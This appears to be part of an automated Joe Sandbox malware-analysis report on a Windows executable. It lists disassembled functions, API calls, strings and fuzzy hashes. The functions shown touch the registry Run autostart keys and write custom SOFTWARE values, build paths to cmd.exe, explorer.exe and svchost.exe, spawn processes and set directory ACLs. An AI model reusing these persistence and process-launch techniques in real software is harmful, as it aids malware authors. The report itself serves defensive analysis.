                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CommandEventLinelstrcmpi$AdminArgvCloseExitHandleOpenProcessUser
                                                                            • String ID: {04D458D6-7C6C-445F-AEAD-313D698F1F0A}${4042FD4A-C237-4861-80BD-1FA24BEF8CE4}${427F0CCF-AF45-4A71-8E02-4FC2A2D64E46}${741330C7-73F4-49B6-9258-6679317DED46}${9A30B3AA-5D5B-4418-94BC-EA9A5585D123}${CCEFB138-B038-41E1-AC53-171A4E58AB6A}${F064C698-006D-4351-BA2C-625A53964F8D}${F6FB16F6-69D4-4502-9E85-2E5E52F61D5C}${F95B00D0-572A-45B1-BD9B-5DB7078A4AC4}
                                                                            • API String ID: 786710000-1271296535
                                                                            • Opcode ID: c38d581cc509ca846226621ee347b1fa2d3e971e1ee3419a89b4ddb2b6c1966f
                                                                            • Instruction ID: 72c8842ddc9628f0a40c4f39f1978c83c6c01bdf51dc9601ea8c6a1b6faa1dfe
                                                                            • Opcode Fuzzy Hash: c38d581cc509ca846226621ee347b1fa2d3e971e1ee3419a89b4ddb2b6c1966f
                                                                            • Instruction Fuzzy Hash: D5912A75A40304EBDB14AFA4DD4DBAE7B75FB88701F10861AF512B63D0CBB99841CB94
                                                                            Function 007D6410 Relevance: 58.0, APIs: 27, Strings: 6, Instructions: 267memoryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 572 7d6410-7d644c LocalAlloc 573 7d6865 572->573 574 7d6452-7d6476 572->574 575 7d6867-7d686a 573->575 577 7d647c-7d6480 574->577 578 7d684a-7d684e 574->578 577->578 579 7d6486-7d6494 577->579 580 7d6858-7d685f LocalFree 578->580 581 7d6850-7d6856 578->581 582 7d64aa-7d64bd 579->582 583 7d6496-7d64a7 call 7e5d7b 579->583 580->573 581->575 585 7d64bf-7d6509 call 7e359a call 7e5d7b 582->585 586 7d650e-7d6521 582->586 583->582 596 7d6845 585->596 589 7d65cc-7d65df 586->589 590 7d6527-7d6541 LocalAlloc 586->590 591 7d665e-7d6671 589->591 592 7d65e1-7d65f9 SHGetKnownFolderPath 589->592 594 7d65c7 590->594 595 7d6547-7d655b GetWindowsDirectoryW 590->595 599 7d66f0-7d6703 591->599 600 7d6673-7d668b SHGetKnownFolderPath 591->600 597 7d6659 592->597 598 7d65fb-7d6652 call 7e359a CoTaskMemFree call 7e5d7b 592->598 594->596 602 7d655d-7d65b3 call 7e359a call 7e5d7b 595->602 603 7d65ba-7d65c1 LocalFree 595->603 597->596 598->597 604 7d6709-7d6723 LocalAlloc 599->604 605 7d67b8-7d67cb 599->605 607 7d668d-7d66e4 call 7e359a CoTaskMemFree call 7e5d7b 600->607 608 7d66eb 600->608 602->603 603->594 611 7d6729-7d673d GetTempPathW 604->611 612 7d67b3 604->612 605->596 616 7d67cd-7d67e5 SHGetKnownFolderPath 605->616 607->608 608->596 618 7d673f-7d679f call 7c1c60 call 7e359a call 7e5d7b 611->618 619 7d67a6-7d67ad LocalFree 611->619 612->596 616->596 617 7d67e7-7d683e call 7e359a CoTaskMemFree call 7e5d7b 616->617 617->596 618->619 619->612
                                                                            APIs
                                                                            • LocalAlloc.KERNELBASE(00000040,?), ref: 007D6439
                                                                            • _wcscat.LIBCMT ref: 007D64A2
                                                                            • __snwprintf.LIBCMT ref: 007D64E4
                                                                            • _wcscat.LIBCMT ref: 007D64FA
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007D652E
                                                                            • GetWindowsDirectoryW.KERNEL32(00000000,00000104), ref: 007D6553
                                                                            • __snwprintf.LIBCMT ref: 007D6595
                                                                            • _wcscat.LIBCMT ref: 007D65AB
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D65C1
                                                                            • SHGetKnownFolderPath.SHELL32(007F7C00,00000000,00000000,?), ref: 007D65F1
                                                                            • __snwprintf.LIBCMT ref: 007D6627
                                                                            • CoTaskMemFree.COMBASE(?), ref: 007D6636
                                                                            • _wcscat.LIBCMT ref: 007D664A
                                                                            • SHGetKnownFolderPath.SHELL32(007F7C40,00000000,00000000,?), ref: 007D6683
                                                                            • __snwprintf.LIBCMT ref: 007D66B9
                                                                            • CoTaskMemFree.COMBASE(?), ref: 007D66C8
                                                                            • _wcscat.LIBCMT ref: 007D66DC
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007D6710
                                                                            • GetTempPathW.KERNEL32(00000104,00000000), ref: 007D6735
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D67AD
                                                                              • Part of subcall function 007C1C60: _wcsrchr.LIBCMT ref: 007C1C6C
                                                                            • __snwprintf.LIBCMT ref: 007D6781
                                                                            • _wcscat.LIBCMT ref: 007D6797
                                                                            • SHGetKnownFolderPath.SHELL32(007F7C10,00000000,00000000,?), ref: 007D67DD
                                                                            • __snwprintf.LIBCMT ref: 007D6813
                                                                            • CoTaskMemFree.COMBASE(?), ref: 007D6822
                                                                            • _wcscat.LIBCMT ref: 007D6836
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D685F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _wcscat$FreeLocal__snwprintf$Path$AllocFolderKnownTask$DirectoryTempWindows_wcsrchr
                                                                            • String ID: '%s%s'$'%s%s'$'%s%s'$'%s%s'$'%s%s'$'%s'
                                                                            • API String ID: 3511546674-4258658051
                                                                            • Opcode ID: b1938e2c59b2461c2997320900da0dfc912f01e709b8b1c8bff9aaaa0475fa10
                                                                            • Instruction ID: d2e9cc714cbc536b5a38876cfce1629ff306a7c562f6eb665051772c0e80932f
                                                                            • Opcode Fuzzy Hash: b1938e2c59b2461c2997320900da0dfc912f01e709b8b1c8bff9aaaa0475fa10
                                                                            • Instruction Fuzzy Hash: 00B171B1A4021DEBDB24DB50DC8DFE9B779BB64304F1085A9E109AB290D778DE85CF50
                                                                            Function 007CB860 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 121COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _memset$__snwprintf$Directory$FileModuleNameSystemWindows
                                                                            • String ID: %s\cmd.exe$%s\explorer.exe$%s\svchost.exe
                                                                            • API String ID: 60459999-2596767422
                                                                            • Opcode ID: c69e1446d9556d37172952188f657aa947c06a78b8c9009afcd80fc42b2288f9
                                                                            • Instruction ID: 54ce2261374929e80f83551c369e34e50fe00bb3d9ee403ec134ffd0d4d29107
                                                                            • Opcode Fuzzy Hash: c69e1446d9556d37172952188f657aa947c06a78b8c9009afcd80fc42b2288f9
                                                                            • Instruction Fuzzy Hash: 6741A8B5A10318AAD760EB709C4AFFA73786F48700F0085D8B619E7181FBB48B94CB95
                                                                            Function 007D42A0 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 76registryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 664 7d42a0-7d42f2 call 7e3520 GetModuleFileNameW 667 7d42f8-7d431b call 7dc570 664->667 668 7d43c6 664->668 667->668 672 7d4321-7d4361 call 7e359a RegOpenKeyExW 667->672 670 7d43c8-7d43cb 668->670 675 7d43b9-7d43c0 LocalFree 672->675 676 7d4363-7d4389 RegSetValueExW 672->676 675->668 677 7d43ac-7d43b3 RegCloseKey 676->677 678 7d438b-7d43aa RegCloseKey LocalFree 676->678 677->675 678->670
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 007D42D4
                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 007D42EA
                                                                              • Part of subcall function 007DC570: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,?,007D430B,?,00000000), ref: 007DC58C
                                                                              • Part of subcall function 007DC570: GetFileSize.KERNEL32(000000FF,00000000,?,007D430B,?), ref: 007DC5A1
                                                                              • Part of subcall function 007DC570: LocalAlloc.KERNELBASE(00000040,000000FF,?,007D430B), ref: 007DC5B6
                                                                              • Part of subcall function 007DC570: ReadFile.KERNELBASE(000000FF,00000000,000000FF,?,00000000), ref: 007DC5D7
                                                                              • Part of subcall function 007DC570: CloseHandle.KERNELBASE(000000FF), ref: 007DC5ED
                                                                            • __snwprintf.LIBCMT ref: 007D4337
                                                                            • RegOpenKeyExW.KERNELBASE(80000001,?,00000000,00000102,?), ref: 007D4359
                                                                            • RegSetValueExW.KERNELBASE(?,{CE0CD485-D472-437F-80D7-DAF95EA046F4},00000000,00000003,00000000,00000000), ref: 007D4381
                                                                            • RegCloseKey.ADVAPI32(?), ref: 007D4392
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D439F
                                                                            • RegCloseKey.ADVAPI32(?), ref: 007D43B3
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D43C0
                                                                            Strings
                                                                            • {DE7C4D5F-E773-43F0-B029-ED407FF538E8}, xrefs: 007D4321
                                                                            • {CE0CD485-D472-437F-80D7-DAF95EA046F4}, xrefs: 007D4375
                                                                            • SOFTWARE\%s, xrefs: 007D4326
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: File$CloseLocal$Free$AllocCreateHandleModuleNameOpenReadSizeValue__snwprintf_memset
                                                                            • String ID: SOFTWARE\%s${CE0CD485-D472-437F-80D7-DAF95EA046F4}${DE7C4D5F-E773-43F0-B029-ED407FF538E8}
                                                                            • API String ID: 3609211549-896602482
                                                                            • Opcode ID: de36bd278f0b2e18bcd121001f5e2a17d3555f9f3f7ca0e5f50941f63319835a
                                                                            • Instruction ID: b3f1fd11e0f0797bf2bae27706f1fd1c07c70ea258fff61ef265e4a81dd64c41
                                                                            • Opcode Fuzzy Hash: de36bd278f0b2e18bcd121001f5e2a17d3555f9f3f7ca0e5f50941f63319835a
                                                                            • Instruction Fuzzy Hash: 9821A8B5A40318ABD720DB64DC4DFEA7778BF44700F004AD8B61CA6281E7B89E84CF91
                                                                            Function 007CFF10 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 74memoryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 679 7cff10-7cff2b SHGetKnownFolderPath 680 7cffff 679->680 681 7cff31-7cff45 LocalAlloc 679->681 682 7d0001-7d0004 680->682 683 7cff4b-7cff72 wnsprintfW 681->683 684 7cfff5-7cfff9 CoTaskMemFree 681->684 685 7cffeb-7cffef LocalFree 683->685 686 7cff74-7cff80 call 7d0400 683->686 684->680 685->684 686->685 689 7cff82-7cffa7 CreateDirectoryW 686->689 690 7cffa9-7cffb4 GetLastError 689->690 691 7cffb6-7cffd9 LocalFree * 2 CoTaskMemFree 689->691 690->691 692 7cffdb-7cffdf 690->692 691->682 692->685 693 7cffe1-7cffe5 LocalFree 692->693 693->685
                                                                            APIs
                                                                            • SHGetKnownFolderPath.SHELL32(007F7C00,00000000,00000000,00831178,?,?,?,?,007C15DF,00831178), ref: 007CFF23
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,?,?,007C15DF,00831178), ref: 007CFF38
                                                                            • wnsprintfW.SHLWAPI ref: 007CFF67
                                                                            • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00831178), ref: 007CFFEF
                                                                              • Part of subcall function 007D0400: AllocateAndInitializeSid.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 007D044D
                                                                              • Part of subcall function 007D0400: _memset.LIBCMT ref: 007D0463
                                                                              • Part of subcall function 007D0400: SetEntriesInAclW.ADVAPI32(00000001,FFFFFFFF,00000000,00000000), ref: 007D04A0
                                                                              • Part of subcall function 007D0400: LocalAlloc.KERNEL32(00000040,00000014), ref: 007D04B3
                                                                              • Part of subcall function 007D0400: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 007D04C8
                                                                              • Part of subcall function 007D0400: SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 007D04DE
                                                                            • CreateDirectoryW.KERNELBASE(?,0000000C), ref: 007CFF9E
                                                                            • GetLastError.KERNEL32 ref: 007CFFA9
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CFFBA
                                                                            • LocalFree.KERNELBASE(?), ref: 007CFFC4
                                                                            • CoTaskMemFree.COMBASE(00831178), ref: 007CFFCE
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CFFE5
                                                                            • CoTaskMemFree.COMBASE(00831178), ref: 007CFFF9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeLocal$AllocDescriptorInitializeSecurityTask$AllocateCreateDaclDirectoryEntriesErrorFolderKnownLastPath_memsetwnsprintf
                                                                            • String ID: %s\%s
                                                                            • API String ID: 4260852628-4073750446
                                                                            • Opcode ID: d59e5eb9270a574419fef29d7b158aaaf5e20772189d6816b13c1691faa3aad9
                                                                            • Instruction ID: e48fb40bec8205a17f93a5f83ae3d7716586714015e76d5cc516ac278ec0bf15
                                                                            • Opcode Fuzzy Hash: d59e5eb9270a574419fef29d7b158aaaf5e20772189d6816b13c1691faa3aad9
                                                                            • Instruction Fuzzy Hash: D6211075900208EBDB14DFA8DC49FADBB79FF84701F10886DF605E6290CB789A80CB50
                                                                            Function 007D6870 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 86memoryprocessCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 694 7d6870-7d688d LocalAlloc 695 7d6991 694->695 696 7d6893-7d68a4 GetSystemDirectoryW 694->696 697 7d6993-7d6996 695->697 698 7d68aa-7d68be LocalAlloc 696->698 699 7d6987-7d698b LocalFree 696->699 698->699 700 7d68c4-7d6960 call 7d79f0 call 7e359a call 7e3520 CreateProcessW 698->700 699->695 707 7d697d-7d6981 LocalFree 700->707 708 7d6962-7d697b LocalFree * 2 700->708 707->699 708->697
                                                                            APIs
                                                                            • LocalAlloc.KERNELBASE(00000040,0000FFFE), ref: 007D6880
                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00007FFF), ref: 007D689C
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007D68B1
                                                                              • Part of subcall function 007D79F0: lstrlenW.KERNEL32(?,?,?,?,?,?,?,007D68E6,007F47E8), ref: 007D7A19
                                                                            • __snwprintf.LIBCMT ref: 007D68FD
                                                                            • _memset.LIBCMT ref: 007D6910
                                                                            • CreateProcessW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 007D6957
                                                                            • LocalFree.KERNELBASE(00000000), ref: 007D6966
                                                                            • LocalFree.KERNELBASE(00000000), ref: 007D6970
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D6981
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D698B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$Alloc$CreateDirectoryProcessSystem__snwprintf_memsetlstrlen
                                                                            • String ID: D
                                                                            • API String ID: 2329958830-2746444292
                                                                            • Opcode ID: cbf67f672c1fe251bd5a68dde8749226b0170ade989cf66aaa034af2c6d253f7
                                                                            • Instruction ID: e008570c719285342af986a35a01b3d0a291d8e3b3f45ecde1286c6aae6bcf6e
                                                                            • Opcode Fuzzy Hash: cbf67f672c1fe251bd5a68dde8749226b0170ade989cf66aaa034af2c6d253f7
                                                                            • Instruction Fuzzy Hash: D53146B5A40208FBDB14DBA4DC4DFED7B79BF88700F1045A9F605AB290DB756A84CB50
                                                                            Function 007D43D0 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 62registrystringCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 709 7d43d0-7d440e call 7e3520 GetModuleFileNameW 712 7d44aa 709->712 713 7d4414-7d4454 call 7e359a RegOpenKeyExW 709->713 715 7d44ac-7d44af 712->715 713->712 717 7d4456-7d4487 lstrlenW RegSetValueExW 713->717 718 7d449d-7d44a4 RegCloseKey 717->718 719 7d4489-7d449b RegCloseKey 717->719 718->712 719->715
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 007D43F0
                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 007D4406
                                                                            • __snwprintf.LIBCMT ref: 007D442A
                                                                            • RegOpenKeyExW.KERNELBASE(80000001,?,00000000,00000102,?), ref: 007D444C
                                                                            • lstrlenW.KERNEL32(?), ref: 007D445D
                                                                            • RegSetValueExW.KERNELBASE(?,{73B46CE5-4FE8-49BB-8E7E-72DC4082B4F8},00000000,00000001,?,00000002), ref: 007D447F
                                                                            • RegCloseKey.ADVAPI32(?), ref: 007D4490
                                                                            • RegCloseKey.ADVAPI32(?), ref: 007D44A4
                                                                            Strings
                                                                            • {DE7C4D5F-E773-43F0-B029-ED407FF538E8}, xrefs: 007D4414
                                                                            • SOFTWARE\%s, xrefs: 007D4419
                                                                            • {73B46CE5-4FE8-49BB-8E7E-72DC4082B4F8}, xrefs: 007D4473
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Close$FileModuleNameOpenValue__snwprintf_memsetlstrlen
                                                                            • String ID: SOFTWARE\%s${73B46CE5-4FE8-49BB-8E7E-72DC4082B4F8}${DE7C4D5F-E773-43F0-B029-ED407FF538E8}
                                                                            • API String ID: 1214033602-923683513
                                                                            • Opcode ID: 02a83ecdc4334e991a2618d8e96c67340de0c7b721d04e096a3ec4cb17e34d45
                                                                            • Instruction ID: eecdfb9bb3b766ba20066ead2baeb1f4583e0084445389aee62f507621ae77a0
                                                                            • Opcode Fuzzy Hash: 02a83ecdc4334e991a2618d8e96c67340de0c7b721d04e096a3ec4cb17e34d45
                                                                            • Instruction Fuzzy Hash: 64119FB5A50314BBD724DB60DC4EFE6737CEB44B00F004698B619E6191EAB49AC4CB61
                                                                            Function 007D2680 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 39registryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 720 7d2680-7d268b 721 7d268d-7d26a3 RegOpenKeyW 720->721 722 7d26be-7d26c5 720->722 721->722 723 7d26a5-7d26b8 RegDeleteValueW RegCloseKey 721->723 724 7d26f8-7d2700 722->724 725 7d26c7-7d26dd RegOpenKeyW 722->725 723->722 725->724 726 7d26df-7d26f2 RegDeleteValueW RegCloseKey 725->726 726->724
                                                                            APIs
                                                                            • RegOpenKeyW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,?), ref: 007D269B
                                                                            • RegDeleteValueW.ADVAPI32(?,00836FC8,?,?,007C1109), ref: 007D26AE
                                                                            • RegCloseKey.ADVAPI32(?,?,?,007C1109), ref: 007D26B8
                                                                            • RegOpenKeyW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,?), ref: 007D26D5
                                                                            • RegDeleteValueW.KERNELBASE(?,{AB1F3E47-AEF1-400E-A108-233A046C3A34},?,?,007C1109), ref: 007D26E8
                                                                            • RegCloseKey.ADVAPI32(?,?,?,007C1109), ref: 007D26F2
                                                                            Strings
                                                                            • SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 007D26CB
                                                                            • {AB1F3E47-AEF1-400E-A108-233A046C3A34}, xrefs: 007D26DF
                                                                            • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 007D2691
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseDeleteOpenValue
                                                                            • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Run$Software\Microsoft\Windows\CurrentVersion\Run${AB1F3E47-AEF1-400E-A108-233A046C3A34}
                                                                            • API String ID: 849931509-2070010218
                                                                            • Opcode ID: 8a198a08896e4b44a8d0a8a07fa227612586551d0f5edd24f83ab434990faac8
                                                                            • Instruction ID: 84b8f44a172d657fe68ad681c9f4e11b233ede66efa053f845b9a7df68751c5b
                                                                            • Opcode Fuzzy Hash: 8a198a08896e4b44a8d0a8a07fa227612586551d0f5edd24f83ab434990faac8
                                                                            • Instruction Fuzzy Hash: 45018679600308FBCB24DBA0FD59E69773CF794B01F104849FA05A1251DA79DA02AB65
                                                                            Function 007CB510 Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 43registryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
